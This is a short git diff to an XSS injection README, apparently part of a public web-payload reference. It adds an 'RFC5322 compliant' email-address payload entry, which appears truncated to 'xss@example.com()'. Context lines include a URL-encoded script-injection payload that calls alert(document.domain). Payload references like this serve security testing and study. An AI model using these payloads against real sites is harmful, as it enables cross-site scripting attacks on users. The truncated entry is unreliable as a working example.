diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 5fae506..3a22514 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -783,6 +783,12 @@ $ echo "" | xxd ">"@x.y ``` +([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)) + +```javascript +xss@example.com() +``` + ### Bypass document blacklist ```javascript @@ -1405,4 +1411,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Bypass < with <](https://hackerone.com/reports/639684) - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) -- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM) \ No newline at end of file +- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)